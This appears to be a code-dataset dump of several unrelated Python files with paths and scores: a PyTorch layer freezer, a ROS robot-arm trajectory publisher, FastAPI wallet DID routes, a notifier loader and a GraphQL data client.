split_name = name.split('.')
module_name_hierarchy = split_name[:-1]
param_name = split_name[-1]
tgt_module = module
for module_name in module_name_hierarchy:
tgt_module = getattr(tgt_module, module_name)
param_data = getattr(tgt_module, param_name).data
delattr(tgt_module, param_name)
tgt_module.register_buffer(name=param_name, tensor=param_data)
@staticmethod
def freeze_by_keywords(module, keywords=None, exclusive_keywords=None):
"""Freezes parameters that matched by the given keywords.
Args:
module: `nn.Module`, the root module to start the params searching.
keywords: `str`, the keys to match target parameters. Multiple keys
can be provided with comma as the separator. If set to `*`,
the entire `module` will be frozen. If set to `None`, nothing
will be frozen. (default: None)
exclusive_keywords: `str`, the keywords to be excluded for target
parameters. Multiple keys can be provided with comma as the
separator. If set to `None`, this method will check all
parameters inside the module. (default: None)
Examples:
>>> # Freeze the mapping network of StyleGAN2:
>>> Freezer.freeze_by_keywords(StyleGAN2Generator, 'mapping')
>>> # Another implementation:
>>> Freezer.freeze_by_keywords(StyleGAN2Generator, '*',
exclusive_keywords='synthesis')
>>> # Freeze the mapping network and affine layers of StyleGAN2:
>>> Freezer.freeze_by_keywords(StyleGAN2Generator, 'mapping, style')
"""
if not keywords: # Shortcut of freezing nothing.
return
# Get parameter name list.
param_list = Freezer.get_module_param_names(module, exclusive_keywords)
if keywords == '*': # Shortcut of freezing everything.
for name in param_list:
Freezer.param_to_buffer(module, name)
return
# Freeze parameters that contains any keyword.
keywords = keywords.replace(' ', '').split(',')
for name in param_list:
if any(keyword in name for keyword in keywords):
Freezer.param_to_buffer(module, name)
@staticmethod
def get_module_param_names(module, exclusive_keywords=None):
"""Gets all parameter names not containing any of exclusive keywords.
Args:
module: `nn.Module`, the root module to start the params searching.
exclusive_keywords: `str`, the words to be excluded for target
parameters. Multiple keys can be provided with comma as the
separator. If set to `None`, this method returns all parameter
names inside the module. (default: None)
Returns:
A list of parameter names filtered out by `exclusive_keywords`.
Examples:
>>> # Get all parameters of StyleGAN discriminator except the task
>>> # head.
>>> param_names = Freezer.get_module_param_names(
StyleGANDiscriminator, exclusive_keywords='output')
"""
if not exclusive_keywords: # Shortcut without filtering.
return [name for name, _ in module.named_parameters()]
# Filter parameters by name.
exclusive_keywords = exclusive_keywords.replace(' ', '').split(',')
return [name for name, _ in module.named_parameters()
if all(key not in name for key in exclusive_keywords)] | 0.922565 | 0.606149 |
import rospy
import numpy as np
from std_msgs.msg import Float64
import math
def talker():
pub_theta1 = rospy.Publisher('/robot_arm/theta1_controller/command', Float64, queue_size=10)
pub_theta2 = rospy.Publisher('/robot_arm/theta2_controller/command', Float64, queue_size=10)
pub_theta3 = rospy.Publisher('/robot_arm/theta3_controller/command', Float64, queue_size=10)
pub_theta4 = rospy.Publisher('/robot_arm/theta4_controller/command', Float64, queue_size=10)
pub_theta5 = rospy.Publisher('/robot_arm/theta5_controller/command', Float64, queue_size=10)
pub_theta6 = rospy.Publisher('/robot_arm/theta6_controller/command', Float64, queue_size=10)
pub_grasp_angle1 = rospy.Publisher('/robot_arm/grasp_angle1_controller/command', Float64, queue_size=10)
pub_grasp_angle2 = rospy.Publisher('/robot_arm/grasp_angle2_controller/command', Float64, queue_size=10)
T = 160 #Time to perform the task
delT = 0.1
n= int(T/delT)
i=0
rospy.init_node('talker', anonymous=True)
rate = rospy.Rate(1/delT) # 10hz
while not rospy.is_shutdown():
if i<=50: #time to stabilize in the default joint configuration
pub_theta1.publish(0)
pub_theta2.publish(3.14)
pub_theta3.publish(0)
pub_theta4.publish(3.14)
pub_theta5.publish(0)
pub_theta6.publish(0)
pub_grasp_angle1.publish(0)
pub_grasp_angle2.publish(0)
elif i<= 55:
pub_theta1.publish(0)
pub_theta2.publish(3.14-0.1)
pub_theta3.publish(0)
pub_theta4.publish(3.14-0.1)
pub_theta5.publish(0)
pub_theta6.publish(0)
pub_grasp_angle1.publish(0)
pub_grasp_angle2.publish(0)
elif i<= 60:
pub_theta1.publish(0)
pub_theta2.publish(3.14-0.2)
pub_theta3.publish(0)
pub_theta4.publish(3.14-0.2)
pub_theta5.publish(0)
pub_theta6.publish(0)
pub_grasp_angle1.publish(0)
pub_grasp_angle2.publish(0)
elif i<= 65:
pub_theta1.publish(0)
pub_theta2.publish(3.14-0.3)
pub_theta3.publish(0)
pub_theta4.publish(3.14-0.3)
pub_theta5.publish(0)
pub_theta6.publish(0)
pub_grasp_angle1.publish(0)
pub_grasp_angle2.publish(0)
elif i<= 70:
pub_theta1.publish(0)
pub_theta2.publish(3.14-0.4)
pub_theta3.publish(0)
pub_theta4.publish(3.14-0.5)
pub_theta5.publish(0)
pub_theta6.publish(0)
pub_grasp_angle1.publish(0)
pub_grasp_angle2.publish(0)
elif i<= 75:
pub_theta1.publish(0)
pub_theta2.publish(3.14-0.4)
pub_theta3.publish(0)
pub_theta4.publish(3.14-0.7)
pub_theta5.publish(0)
pub_theta6.publish(0)
pub_grasp_angle1.publish(0)
pub_grasp_angle2.publish(0)
elif i<= 80:
pub_theta1.publish(0)
pub_theta2.publish(3.14-0.4)
pub_theta3.publish(0)
pub_theta4.publish(3.14-0.9)
pub_theta5.publish(0)
pub_theta6.publish(0)
pub_grasp_angle1.publish(0)
pub_grasp_angle2.publish(0)
elif i<= 85:
pub_theta1.publish(0.2)
pub_theta2.publish(3.14-0.4)
pub_theta3.publish(0)
pub_theta4.publish(3.14-1.05)
pub_theta5.publish(0)
pub_theta6.publish(0)
pub_grasp_angle1.publish(0)
pub_grasp_angle2.publish(0)
elif i<= 90:
pub_theta1.publish(0.27)
pub_theta2.publish(3.14-0.4)
pub_theta3.publish(0)
pub_theta4.publish(3.14-1.05)
pub_theta5.publish(0)
pub_theta6.publish(0)
pub_grasp_angle1.publish(0.2)
pub_grasp_angle2.publish(0.2)
elif i<= 120:
print("Unscrewing Fuel Tank Lid") #time for unscrewing the lid
pub_theta1.publish(0.27)
pub_theta2.publish(3.14-0.4)
pub_theta3.publish(0)
pub_theta4.publish(3.14-1.05)
pub_theta5.publish(0)
pub_theta6.publish(0.1)
pub_grasp_angle1.publish(0.2)
pub_grasp_angle2.publish(0.2)
elif i<= 122:
pub_theta1.publish(0.35)
pub_theta2.publish(3.14-0.4)
pub_theta3.publish(0)
pub_theta4.publish(3.14-1.05)
pub_theta5.publish(0)
pub_theta6.publish(0)
pub_grasp_angle1.publish(0.2)
pub_grasp_angle2.publish(0.2)
elif i<= 125:
pub_theta1.publish(0.4)
pub_theta2.publish(3.14-0.4)
pub_theta3.publish(0)
pub_theta4.publish(3.14-1.1)
pub_theta5.publish(0)
pub_theta6.publish(0)
pub_grasp_angle1.publish(0.2)
pub_grasp_angle2.publish(0.2)
elif i<= 128:
pub_theta1.publish(0.5)
pub_theta2.publish(3.14-0.35)
pub_theta3.publish(0)
pub_theta4.publish(3.14-1.1)
pub_theta5.publish(0)
pub_theta6.publish(0)
pub_grasp_angle1.publish(0.2)
pub_grasp_angle2.publish(0.2)
elif i<= 130:
pub_theta1.publish(0.6)
pub_theta2.publish(3.14-0.3)
pub_theta3.publish(0)
pub_theta4.publish(3.14-1.2)
pub_theta5.publish(0)
pub_theta6.publish(0)
pub_grasp_angle1.publish(0.2)
pub_grasp_angle2.publish(0.2)
elif i<= 133:
pub_theta1.publish(0.65)
pub_theta2.publish(3.14-0.25)
pub_theta3.publish(0)
pub_theta4.publish(3.14-1.2)
pub_theta5.publish(0)
pub_theta6.publish(0)
pub_grasp_angle1.publish(0.2)
pub_grasp_angle2.publish(0.2)
elif i<= 135:
pub_theta1.publish(0.7)
pub_theta2.publish(3.14-0.2)
pub_theta3.publish(0)
pub_theta4.publish(3.14-1.4)
pub_theta5.publish(0)
pub_theta6.publish(0)
pub_grasp_angle1.publish(0.2)
pub_grasp_angle2.publish(0.2)
elif i<= 138:
pub_theta1.publish(0.7)
pub_theta2.publish(3.14-0.25)
pub_theta3.publish(0)
pub_theta4.publish(3.14-1.2)
pub_theta5.publish(0)
pub_theta6.publish(0)
pub_grasp_angle1.publish(0.2)
pub_grasp_angle2.publish(0.2)
elif i<= 140:
pub_theta1.publish(0.7)
pub_theta2.publish(3.14-0.2)
pub_theta3.publish(0)
pub_theta4.publish(3.14-1.4)
pub_theta5.publish(0)
pub_theta6.publish(0)
pub_grasp_angle1.publish(0)
pub_grasp_angle2.publish(0)
elif i<= 143:
pub_theta1.publish(0.7)
pub_theta2.publish(3.14-0.2)
pub_theta3.publish(0)
pub_theta4.publish(3.14-1.4)
pub_theta5.publish(0)
pub_theta6.publish(0)
pub_grasp_angle1.publish(0)
pub_grasp_angle2.publish(0)
elif i<= 145:
pub_theta1.publish(0.7)
pub_theta2.publish(3.14-0.2)
pub_theta3.publish(0)
pub_theta4.publish(3.14-1.4)
pub_theta5.publish(0)
pub_theta6.publish(0)
pub_grasp_angle1.publish(0)
pub_grasp_angle2.publish(0)
elif i<= 145:
pub_theta1.publish(0.65)
pub_theta2.publish(3.14-0.2)
pub_theta3.publish(0)
pub_theta4.publish(3.14-1.4)
pub_theta5.publish(0)
pub_theta6.publish(0)
pub_grasp_angle1.publish(0)
pub_grasp_angle2.publish(0)
elif i<= 150:
pub_theta1.publish(0.6)
pub_theta2.publish(3.14-0.3)
pub_theta3.publish(0)
pub_theta4.publish(3.14-1.2)
pub_theta5.publish(0)
pub_theta6.publish(0)
pub_grasp_angle1.publish(0)
pub_grasp_angle2.publish(0)
elif i<= 150:
pub_theta1.publish(0.5)
pub_theta2.publish(3.14-0.3)
pub_theta3.publish(0)
pub_theta4.publish(3.14-1.2)
pub_theta5.publish(0)
pub_theta6.publish(0)
pub_grasp_angle1.publish(0)
pub_grasp_angle2.publish(0)
elif i<= 155:
pub_theta1.publish(0.4)
pub_theta2.publish(3.14-0.4)
pub_theta3.publish(0)
pub_theta4.publish(3.14-1.1)
pub_theta5.publish(0)
pub_theta6.publish(0)
pub_grasp_angle1.publish(0)
pub_grasp_angle2.publish(0)
elif i<= 158:
pub_theta1.publish(0.35)
pub_theta2.publish(3.14-0.4)
pub_theta3.publish(0)
pub_theta4.publish(3.14-1.1)
pub_theta5.publish(0)
pub_theta6.publish(0)
pub_grasp_angle1.publish(0)
pub_grasp_angle2.publish(0)
elif i<= 160:
pub_theta1.publish(0.27)
pub_theta2.publish(3.14-0.4)
pub_theta3.publish(0)
pub_theta4.publish(3.14-1.05)
pub_theta5.publish(0)
pub_theta6.publish(0)
pub_grasp_angle1.publish(0)
pub_grasp_angle2.publish(0)
else:
break
rate.sleep()
print("Executing Task")
i=i+1
if __name__ == '__main__':
try:
talker()
except rospy.ROSInterruptException:
pass | robot_arm/src/trajectory_publisher.py |
import rospy
import numpy as np
from std_msgs.msg import Float64
import math
def talker():
pub_theta1 = rospy.Publisher('/robot_arm/theta1_controller/command', Float64, queue_size=10)
pub_theta2 = rospy.Publisher('/robot_arm/theta2_controller/command', Float64, queue_size=10)
pub_theta3 = rospy.Publisher('/robot_arm/theta3_controller/command', Float64, queue_size=10)
pub_theta4 = rospy.Publisher('/robot_arm/theta4_controller/command', Float64, queue_size=10)
pub_theta5 = rospy.Publisher('/robot_arm/theta5_controller/command', Float64, queue_size=10)
pub_theta6 = rospy.Publisher('/robot_arm/theta6_controller/command', Float64, queue_size=10)
pub_grasp_angle1 = rospy.Publisher('/robot_arm/grasp_angle1_controller/command', Float64, queue_size=10)
pub_grasp_angle2 = rospy.Publisher('/robot_arm/grasp_angle2_controller/command', Float64, queue_size=10)
T = 160 #Time to perform the task
delT = 0.1
n= int(T/delT)
i=0
rospy.init_node('talker', anonymous=True)
rate = rospy.Rate(1/delT) # 10hz
while not rospy.is_shutdown():
if i<=50: #time to stabilize in the default joint configuration
pub_theta1.publish(0)
pub_theta2.publish(3.14)
pub_theta3.publish(0)
pub_theta4.publish(3.14)
pub_theta5.publish(0)
pub_theta6.publish(0)
pub_grasp_angle1.publish(0)
pub_grasp_angle2.publish(0)
elif i<= 55:
pub_theta1.publish(0)
pub_theta2.publish(3.14-0.1)
pub_theta3.publish(0)
pub_theta4.publish(3.14-0.1)
pub_theta5.publish(0)
pub_theta6.publish(0)
pub_grasp_angle1.publish(0)
pub_grasp_angle2.publish(0)
elif i<= 60:
pub_theta1.publish(0)
pub_theta2.publish(3.14-0.2)
pub_theta3.publish(0)
pub_theta4.publish(3.14-0.2)
pub_theta5.publish(0)
pub_theta6.publish(0)
pub_grasp_angle1.publish(0)
pub_grasp_angle2.publish(0)
elif i<= 65:
pub_theta1.publish(0)
pub_theta2.publish(3.14-0.3)
pub_theta3.publish(0)
pub_theta4.publish(3.14-0.3)
pub_theta5.publish(0)
pub_theta6.publish(0)
pub_grasp_angle1.publish(0)
pub_grasp_angle2.publish(0)
elif i<= 70:
pub_theta1.publish(0)
pub_theta2.publish(3.14-0.4)
pub_theta3.publish(0)
pub_theta4.publish(3.14-0.5)
pub_theta5.publish(0)
pub_theta6.publish(0)
pub_grasp_angle1.publish(0)
pub_grasp_angle2.publish(0)
elif i<= 75:
pub_theta1.publish(0)
pub_theta2.publish(3.14-0.4)
pub_theta3.publish(0)
pub_theta4.publish(3.14-0.7)
pub_theta5.publish(0)
pub_theta6.publish(0)
pub_grasp_angle1.publish(0)
pub_grasp_angle2.publish(0)
elif i<= 80:
pub_theta1.publish(0)
pub_theta2.publish(3.14-0.4)
pub_theta3.publish(0)
pub_theta4.publish(3.14-0.9)
pub_theta5.publish(0)
pub_theta6.publish(0)
pub_grasp_angle1.publish(0)
pub_grasp_angle2.publish(0)
elif i<= 85:
pub_theta1.publish(0.2)
pub_theta2.publish(3.14-0.4)
pub_theta3.publish(0)
pub_theta4.publish(3.14-1.05)
pub_theta5.publish(0)
pub_theta6.publish(0)
pub_grasp_angle1.publish(0)
pub_grasp_angle2.publish(0)
elif i<= 90:
pub_theta1.publish(0.27)
pub_theta2.publish(3.14-0.4)
pub_theta3.publish(0)
pub_theta4.publish(3.14-1.05)
pub_theta5.publish(0)
pub_theta6.publish(0)
pub_grasp_angle1.publish(0.2)
pub_grasp_angle2.publish(0.2)
elif i<= 120:
print("Unscrewing Fuel Tank Lid") #time for unscrewing the lid
pub_theta1.publish(0.27)
pub_theta2.publish(3.14-0.4)
pub_theta3.publish(0)
pub_theta4.publish(3.14-1.05)
pub_theta5.publish(0)
pub_theta6.publish(0.1)
pub_grasp_angle1.publish(0.2)
pub_grasp_angle2.publish(0.2)
elif i<= 122:
pub_theta1.publish(0.35)
pub_theta2.publish(3.14-0.4)
pub_theta3.publish(0)
pub_theta4.publish(3.14-1.05)
pub_theta5.publish(0)
pub_theta6.publish(0)
pub_grasp_angle1.publish(0.2)
pub_grasp_angle2.publish(0.2)
elif i<= 125:
pub_theta1.publish(0.4)
pub_theta2.publish(3.14-0.4)
pub_theta3.publish(0)
pub_theta4.publish(3.14-1.1)
pub_theta5.publish(0)
pub_theta6.publish(0)
pub_grasp_angle1.publish(0.2)
pub_grasp_angle2.publish(0.2)
elif i<= 128:
pub_theta1.publish(0.5)
pub_theta2.publish(3.14-0.35)
pub_theta3.publish(0)
pub_theta4.publish(3.14-1.1)
pub_theta5.publish(0)
pub_theta6.publish(0)
pub_grasp_angle1.publish(0.2)
pub_grasp_angle2.publish(0.2)
elif i<= 130:
pub_theta1.publish(0.6)
pub_theta2.publish(3.14-0.3)
pub_theta3.publish(0)
pub_theta4.publish(3.14-1.2)
pub_theta5.publish(0)
pub_theta6.publish(0)
pub_grasp_angle1.publish(0.2)
pub_grasp_angle2.publish(0.2)
elif i<= 133:
pub_theta1.publish(0.65)
pub_theta2.publish(3.14-0.25)
pub_theta3.publish(0)
pub_theta4.publish(3.14-1.2)
pub_theta5.publish(0)
pub_theta6.publish(0)
pub_grasp_angle1.publish(0.2)
pub_grasp_angle2.publish(0.2)
elif i<= 135:
pub_theta1.publish(0.7)
pub_theta2.publish(3.14-0.2)
pub_theta3.publish(0)
pub_theta4.publish(3.14-1.4)
pub_theta5.publish(0)
pub_theta6.publish(0)
pub_grasp_angle1.publish(0.2)
pub_grasp_angle2.publish(0.2)
elif i<= 138:
pub_theta1.publish(0.7)
pub_theta2.publish(3.14-0.25)
pub_theta3.publish(0)
pub_theta4.publish(3.14-1.2)
pub_theta5.publish(0)
pub_theta6.publish(0)
pub_grasp_angle1.publish(0.2)
pub_grasp_angle2.publish(0.2)
elif i<= 140:
pub_theta1.publish(0.7)
pub_theta2.publish(3.14-0.2)
pub_theta3.publish(0)
pub_theta4.publish(3.14-1.4)
pub_theta5.publish(0)
pub_theta6.publish(0)
pub_grasp_angle1.publish(0)
pub_grasp_angle2.publish(0)
elif i<= 143:
pub_theta1.publish(0.7)
pub_theta2.publish(3.14-0.2)
pub_theta3.publish(0)
pub_theta4.publish(3.14-1.4)
pub_theta5.publish(0)
pub_theta6.publish(0)
pub_grasp_angle1.publish(0)
pub_grasp_angle2.publish(0)
elif i<= 145:
pub_theta1.publish(0.7)
pub_theta2.publish(3.14-0.2)
pub_theta3.publish(0)
pub_theta4.publish(3.14-1.4)
pub_theta5.publish(0)
pub_theta6.publish(0)
pub_grasp_angle1.publish(0)
pub_grasp_angle2.publish(0)
elif i<= 145:
pub_theta1.publish(0.65)
pub_theta2.publish(3.14-0.2)
pub_theta3.publish(0)
pub_theta4.publish(3.14-1.4)
pub_theta5.publish(0)
pub_theta6.publish(0)
pub_grasp_angle1.publish(0)
pub_grasp_angle2.publish(0)
elif i<= 150:
pub_theta1.publish(0.6)
pub_theta2.publish(3.14-0.3)
pub_theta3.publish(0)
pub_theta4.publish(3.14-1.2)
pub_theta5.publish(0)
pub_theta6.publish(0)
pub_grasp_angle1.publish(0)
pub_grasp_angle2.publish(0)
elif i<= 150:
pub_theta1.publish(0.5)
pub_theta2.publish(3.14-0.3)
pub_theta3.publish(0)
pub_theta4.publish(3.14-1.2)
pub_theta5.publish(0)
pub_theta6.publish(0)
pub_grasp_angle1.publish(0)
pub_grasp_angle2.publish(0)
elif i<= 155:
pub_theta1.publish(0.4)
pub_theta2.publish(3.14-0.4)
pub_theta3.publish(0)
pub_theta4.publish(3.14-1.1)
pub_theta5.publish(0)
pub_theta6.publish(0)
pub_grasp_angle1.publish(0)
pub_grasp_angle2.publish(0)
elif i<= 158:
pub_theta1.publish(0.35)
pub_theta2.publish(3.14-0.4)
pub_theta3.publish(0)
pub_theta4.publish(3.14-1.1)
pub_theta5.publish(0)
pub_theta6.publish(0)
pub_grasp_angle1.publish(0)
pub_grasp_angle2.publish(0)
elif i<= 160:
pub_theta1.publish(0.27)
pub_theta2.publish(3.14-0.4)
pub_theta3.publish(0)
pub_theta4.publish(3.14-1.05)
pub_theta5.publish(0)
pub_theta6.publish(0)
pub_grasp_angle1.publish(0)
pub_grasp_angle2.publish(0)
else:
break
rate.sleep()
print("Executing Task")
i=i+1
if __name__ == '__main__':
try:
talker()
except rospy.ROSInterruptException:
pass | 0.356223 | 0.125708 |
import logging
from typing import List
from aries_cloudcontroller import (
DID,
AcaPyClient,
DIDEndpoint,
DIDEndpointWithType,
)
from fastapi import APIRouter, Depends
from app.dependencies import agent_selector
from app.facades import acapy_wallet
from app.error import CloudApiException
from .models import SetDidEndpointRequest
logger = logging.getLogger(__name__)
router = APIRouter(prefix="/wallet/dids", tags=["wallet"])
@router.post("/", response_model=DID)
async def create_did(
aries_controller: AcaPyClient = Depends(agent_selector),
):
"""Create Local DID."""
return await acapy_wallet.create_did(aries_controller)
@router.get("/", response_model=List[DID])
async def list_dids(
aries_controller: AcaPyClient = Depends(agent_selector),
):
"""
Retrieve list of DIDs.
"""
did_result = await aries_controller.wallet.get_dids()
if not did_result.results:
return []
return did_result.results
@router.get("/public", response_model=DID)
async def get_public_did(
aries_controller: AcaPyClient = Depends(agent_selector),
):
"""
Fetch the current public DID.
"""
result = await aries_controller.wallet.get_public_did()
if not result.result:
raise CloudApiException("No public did found", 404)
return result.result
@router.put("/public", response_model=DID)
async def set_public_did(
did: str,
aries_controller: AcaPyClient = Depends(agent_selector),
):
"""Set the current public DID."""
return await acapy_wallet.set_public_did(aries_controller, did)
@router.patch("/{did}/rotate-keypair", status_code=204)
async def rotate_keypair(
did: str,
aries_controller: AcaPyClient = Depends(agent_selector),
):
await aries_controller.wallet.rotate_keypair(did=did)
@router.get("/{did}/endpoint", response_model=DIDEndpoint)
async def get_did_endpoint(
did: str,
aries_controller: AcaPyClient = Depends(agent_selector),
):
"""Get DID endpoint."""
return await aries_controller.wallet.get_did_endpoint(did=did)
@router.post("/{did}/endpoint", status_code=204)
async def set_did_endpoint(
did: str,
body: SetDidEndpointRequest,
aries_controller: AcaPyClient = Depends(agent_selector),
):
"""Update Endpoint in wallet and on ledger if posted to it."""
# "Endpoint" type is for making connections using public indy DIDs
endpoint_type = "Endpoint"
await aries_controller.wallet.set_did_endpoint(
body=DIDEndpointWithType(
did=did, endpoint=body.endpoint, endpoint_type=endpoint_type
)
) | app/generic/wallet/wallet.py | import logging
from typing import List
from aries_cloudcontroller import (
DID,
AcaPyClient,
DIDEndpoint,
DIDEndpointWithType,
)
from fastapi import APIRouter, Depends
from app.dependencies import agent_selector
from app.facades import acapy_wallet
from app.error import CloudApiException
from .models import SetDidEndpointRequest
logger = logging.getLogger(__name__)
router = APIRouter(prefix="/wallet/dids", tags=["wallet"])
@router.post("/", response_model=DID)
async def create_did(
aries_controller: AcaPyClient = Depends(agent_selector),
):
"""Create Local DID."""
return await acapy_wallet.create_did(aries_controller)
@router.get("/", response_model=List[DID])
async def list_dids(
aries_controller: AcaPyClient = Depends(agent_selector),
):
"""
Retrieve list of DIDs.
"""
did_result = await aries_controller.wallet.get_dids()
if not did_result.results:
return []
return did_result.results
@router.get("/public", response_model=DID)
async def get_public_did(
aries_controller: AcaPyClient = Depends(agent_selector),
):
"""
Fetch the current public DID.
"""
result = await aries_controller.wallet.get_public_did()
if not result.result:
raise CloudApiException("No public did found", 404)
return result.result
@router.put("/public", response_model=DID)
async def set_public_did(
did: str,
aries_controller: AcaPyClient = Depends(agent_selector),
):
"""Set the current public DID."""
return await acapy_wallet.set_public_did(aries_controller, did)
@router.patch("/{did}/rotate-keypair", status_code=204)
async def rotate_keypair(
did: str,
aries_controller: AcaPyClient = Depends(agent_selector),
):
await aries_controller.wallet.rotate_keypair(did=did)
@router.get("/{did}/endpoint", response_model=DIDEndpoint)
async def get_did_endpoint(
did: str,
aries_controller: AcaPyClient = Depends(agent_selector),
):
"""Get DID endpoint."""
return await aries_controller.wallet.get_did_endpoint(did=did)
@router.post("/{did}/endpoint", status_code=204)
async def set_did_endpoint(
did: str,
body: SetDidEndpointRequest,
aries_controller: AcaPyClient = Depends(agent_selector),
):
"""Update Endpoint in wallet and on ledger if posted to it."""
# "Endpoint" type is for making connections using public indy DIDs
endpoint_type = "Endpoint"
await aries_controller.wallet.set_did_endpoint(
body=DIDEndpointWithType(
did=did, endpoint=body.endpoint, endpoint_type=endpoint_type
)
) | 0.780077 | 0.164248 |
import os
import logging
import pkgutil
import importlib
logger = logging.getLogger(__name__)
def dummy_notify_factory(notify_func):
def factory(conf, value):
return notify_func
return factory
def load_notifiers():
path = os.path.dirname(os.path.abspath(__file__))
before, sep, _ = __name__.rpartition('.')
prefix = before + sep
registry = {}
for _, modname, _ in pkgutil.walk_packages([path], prefix):
submodule = importlib.import_module(modname, __name__)
if hasattr(submodule, 'register'):
submodule.register(registry)
else:
key = getattr(submodule, 'NAME', modname.split('.')[-1])
if hasattr(submodule, 'notify_factory'):
registry[key] = submodule.notify_factory
elif hasattr(submodule, 'notify'):
registry[key] = dummy_notify_factory(submodule.notify)
return registry
class CompositeNotifier(object):
REGISTRY = load_notifiers()
def __init__(self, conf):
self.conf = conf
notifiers_conf = conf.get('notify', [])
if not notifiers_conf:
logger.warning(
"No notifications configured for %r",
conf['name'],
)
self.notifiers = []
for notifier_conf in notifiers_conf:
self.add_notifier(notifier_conf)
def add_notifier(self, notifier_conf):
try:
name, value = next(iter(notifier_conf.items()))
except AttributeError:
name, value = notifier_conf, None
try:
notify_factory = self.REGISTRY[name]
except KeyError:
logger.error("Unknown notifier %r", name)
else:
self.notifiers.append(
notify_factory(conf=self.conf, value=value)
)
def notify(self, report):
if report:
logger.debug('Sending report: %r', report)
for notifier in self.notifiers:
try:
notifier(report=report)
except:
logger.exception(
"Exception occurred during sending notification"
)
else:
logger.debug('Report is empty, skipping notification')
__call__ = notify | kibitzr/notifier/factory.py | import os
import logging
import pkgutil
import importlib
logger = logging.getLogger(__name__)
def dummy_notify_factory(notify_func):
def factory(conf, value):
return notify_func
return factory
def load_notifiers():
path = os.path.dirname(os.path.abspath(__file__))
before, sep, _ = __name__.rpartition('.')
prefix = before + sep
registry = {}
for _, modname, _ in pkgutil.walk_packages([path], prefix):
submodule = importlib.import_module(modname, __name__)
if hasattr(submodule, 'register'):
submodule.register(registry)
else:
key = getattr(submodule, 'NAME', modname.split('.')[-1])
if hasattr(submodule, 'notify_factory'):
registry[key] = submodule.notify_factory
elif hasattr(submodule, 'notify'):
registry[key] = dummy_notify_factory(submodule.notify)
return registry
class CompositeNotifier(object):
REGISTRY = load_notifiers()
def __init__(self, conf):
self.conf = conf
notifiers_conf = conf.get('notify', [])
if not notifiers_conf:
logger.warning(
"No notifications configured for %r",
conf['name'],
)
self.notifiers = []
for notifier_conf in notifiers_conf:
self.add_notifier(notifier_conf)
def add_notifier(self, notifier_conf):
try:
name, value = next(iter(notifier_conf.items()))
except AttributeError:
name, value = notifier_conf, None
try:
notify_factory = self.REGISTRY[name]
except KeyError:
logger.error("Unknown notifier %r", name)
else:
self.notifiers.append(
notify_factory(conf=self.conf, value=value)
)
def notify(self, report):
if report:
logger.debug('Sending report: %r', report)
for notifier in self.notifiers:
try:
notifier(report=report)
except:
logger.exception(
"Exception occurred during sending notification"
)
else:
logger.debug('Report is empty, skipping notification')
__call__ = notify | 0.259356 | 0.052814 |
from gql import gql, Client
from gql.transport.requests import RequestsHTTPTransport
from flatdict import FlatDict
import pandas as pd
# flatten array of nested dicts to array of single level dictionary
def flatten(data, delimiter=':'):
# flatten data
frame = pd.DataFrame(map(lambda x: FlatDict(x, delimiter=delimiter), data))
# drop all columns that only contain empty values and return
return frame.dropna(axis=1, how='all')
# unwrap nested arrays in an array of dicts to a single array of dicts
# this replicates the contents of the parent dict to all nested instances
# eg. [{'a': 'x', 'b':[1, 2]}] -> [{'a': 'x', 'b':1}, [{'a': 'x', 'b':2}]
def repl(data, ref):
return [{**row, ref: k} for row in data for k in row[ref]]
# create a client
class Data:
_authenticated = False
def __init__(self, url, token=None):
cookies = {}
if token:
cookies['KIWI_PHPSESSID'] = token
self._authenticated = True
transport = RequestsHTTPTransport(url, cookies=cookies)
self.client = Client(
transport=transport,
fetch_schema_from_transport=True,
)
@property
def authenticated(self):
return self._authenticated
@property
def admin(self):
if not self._authenticated:
return False
query = gql('''
{
user {
isAdmin
}
}
''')
result = self.client.execute(query)
return result['user']['isAdmin']
def activities(self):
query = gql('''
{
current {
name
description
author {
name
}
location {
address
}
}
}
''')
result = self.client.execute(query)
return flatten(result['current'])
def registrations(self):
query = gql('''
{
current {
name
registrations {
created
deleted
}
}
}
''')
result = self.client.execute(query)
registrations = flatten(repl(result['current'], 'registrations'))
return registrations.loc[registrations["registrations:deleted"].isnull(), ['name', 'registrations:created']]
def user_relations(self):
query = gql('''
{
user {
relations {
group {
name
}
}
}
}
''')
result = self.client.execute(query)
return flatten(result['user']['relations'])
def user_registrations(self):
query = gql('''
{
user {
registrations {
activity {
name
start
}
option {
price
}
}
}
}
''')
result = self.client.execute(query)
return flatten(result['user']['registrations'])
def groups(self):
if not self._authenticated:
raise Exception("Source unauthenticated")
query = gql('''
{
groups {
name
}
}
''')
result = self.client.execute(query)
return flatten(result['groups']) | src/data.py | from gql import gql, Client
from gql.transport.requests import RequestsHTTPTransport
from flatdict import FlatDict
import pandas as pd
# flatten array of nested dicts to array of single level dictionary
def flatten(data, delimiter=':'):
# flatten data
frame = pd.DataFrame(map(lambda x: FlatDict(x, delimiter=delimiter), data))
# drop all columns that only contain empty values and return
return frame.dropna(axis=1, how='all')
# unwrap nested arrays in an array of dicts to a single array of dicts
# this replicates the contents of the parent dict to all nested instances
# eg. [{'a': 'x', 'b':[1, 2]}] -> [{'a': 'x', 'b':1}, [{'a': 'x', 'b':2}]
def repl(data, ref):
return [{**row, ref: k} for row in data for k in row[ref]]
# create a client
class Data:
_authenticated = False
def __init__(self, url, token=None):
cookies = {}
if token:
cookies['KIWI_PHPSESSID'] = token
self._authenticated = True
transport = RequestsHTTPTransport(url, cookies=cookies)
self.client = Client(
transport=transport,
fetch_schema_from_transport=True,
)
@property
def authenticated(self):
return self._authenticated
@property
def admin(self):
if not self._authenticated:
return False
query = gql('''
{
user {
isAdmin
}
}
''')
result = self.client.execute(query)
return result['user']['isAdmin']
def activities(self):
query = gql('''
{
current {
name
description
author {
name
}
location {
address
}
}
}
''')
result = self.client.execute(query)
return flatten(result['current'])
def registrations(self):
query = gql('''
{
current {
name
registrations {
created
deleted
}
}
}
''')
result = self.client.execute(query)
registrations = flatten(repl(result['current'], 'registrations'))
return registrations.loc[registrations["registrations:deleted"].isnull(), ['name', 'registrations:created']]
def user_relations(self):
query = gql('''
{
user {
relations {
group {
name
}
}
}
}
''')
result = self.client.execute(query)
return flatten(result['user']['relations'])
def user_registrations(self):
query = gql('''
{
user {
registrations {
activity {
name
start
}
option {
price
}
}
}
}
''')
result = self.client.execute(query)
return flatten(result['user']['registrations'])
def groups(self):
if not self._authenticated:
raise Exception("Source unauthenticated")
query = gql('''
{
groups {
name
}
}
''')
result = self.client.execute(query)
return flatten(result['groups']) | 0.727589 | 0.363619 |
from typing import List
from r2c_isg.structures import Dataset
def sort(ds: Dataset, params: List[str]) -> None:
"""Sorts the projects/versions based on the given parameters."""
